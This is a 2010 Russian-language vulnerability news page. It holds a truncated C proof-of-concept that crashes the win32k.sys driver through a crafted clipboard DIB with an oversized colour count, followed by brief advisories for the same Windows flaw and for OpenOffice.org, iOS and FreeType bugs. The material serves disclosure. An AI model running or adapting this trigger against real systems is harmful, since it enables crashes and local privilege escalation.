SgW32 Вторник, 19.03.2024, 09:24
Главная | Регистрация | Вход Приветствую Вас Гость | RSS
Меню сайта

Разделы новостей
Уязвимости [106]
Релизы [7]
Туториалы [0]
Новости сайта [2]
Инетересности [2]
Другое [1]

Наш опрос
Каких программ на сайте не хватает?
Всего ответов: 72

Главная » 2010 » Август » 09
Эксплоит на C, эксплуатирует отказ в обслуживании в драйвере

win32k.sys


DEVMODE dm = {0};
dm.dmSize  = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);

BITMAPINFOHEADER bmih = {0};

bmih.biClrUsed = 0×200;

HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0×1000);

memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);

OpenClipboard(NULL);

SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard(); ... Читать дальше »
Категория: Уязвимости | Просмотров: 1128 | Добавил: Sgw32 | Дата: 09.08.2010 | Комментарии (0)


07 августа, 2010

Программа:
Microsoft Windows XP
Microsoft Windows 2003
Microsoft Windows Vista
Microsoft Windows 2008
Microsoft Windows 7

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет локальному пользователю повысить свои привилегии на системе.

Уязвимость существует из-за ошибки проверки границ данных в функции CreateDIBPalette() в драйвере win32k.sys при копировании значений цветов в фиксированный буфер во время создания DIB палитры. Локальный пользователь может вызвать переполнение буфера через GetClipboardData() API, указав слишком большое количество цветов (более 256) через поле "biClrUsed" в структуре BITMAPINFOHEADE ... Читать дальше »

Категория: Уязвимости | Просмотров: 961 | Добавил: Sgw32 | Дата: 09.08.2010 | Комментарии (0)

06 августа, 2010

Программа: OpenOffice.org 3.2.1 для Windows, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный код на целевой системе.

1. Уязвимость существует из-за ошибки усечения целочисленных при обработке определенных данных. Удаленный пользователь может с помощью специально сформированного файла вызвать переполнение динамической памяти и выполнить произвольный код на целевой системе.

2. Уязвимость существует из-за целочисленного переполнения при обработке некоторых данных. Удаленный пользователь может с помощью специально сформированного файла вызвать переполнение динамической памяти и выполнить произвольный код на це ... Читать дальше »

Категория: Уязвимости | Просмотров: 623 | Добавил: Sgw32 | Дата: 09.08.2010 | Комментарии (1)


06 августа, 2010

Программа: Apple IPhone OS (iOS) 4.0.1, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют злоумышленнику повысить свои привилегии и выполнить произвольный код на устройстве.

1. Уязвимость существует из-за неизвестной ошибки в ядре, которая позволяет локальному пользователю повысить свои привилегии.

2. Уязвимость существует из-за ошибки при обработке определенных опкодов в CFF (Compact Font Format) шрифте, встроенном, например, в PDF файл. Удаленный пользователь может с помощью специально сформированного PDF файла вызвать повреждение памяти и выполнить произвольный код на целевой системе.

Примечание: уязвимости используются в настоящее время дл ... Читать дальше »

Категория: Уязвимости | Просмотров: 586 | Добавил: Sgw32 | Дата: 09.08.2010 | Комментарии (0)

Множественные уязвимости в FreeType

09 августа, 2010

Программа: FreeType 2.4.2, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный код на целевой системе.

1. Уязвимость существует из-за ошибок при обработке опкодов в Compact Font Format (CFF) шрифтах. Удаленный пользователь может с помощью специально сформированного CFF шрифта вызвать переполнение стека и выполнить произвольный код на целевой системе. Уязвимость относится к:
www.securitylab.ru/vulnerability/396494.php

2. Уязвимость существует из-за ошибки проверки границ данных в функции Mac_Read_POST_Resou ... Читать дальше »

Категория: Уязвимости | Просмотров: 662 | Добавил: Sgw32 | Дата: 09.08.2010 | Комментарии (0)

Форма входа

Календарь новостей
«  Август 2010  »
ПнВтСрЧтПтСбВс
      1
2345678
9101112131415
16171819202122
23242526272829
3031

Поиск

Друзья сайта

    Integral Calculator
    Enter a function to integrate:

    Variable:

    Limit Calculator
    Enter a function to compute its limit:
    Limit variable: Compute at: Limit type

Статистика

Copyright Sgw32 Corporation © 2024 Используются технологии uCoz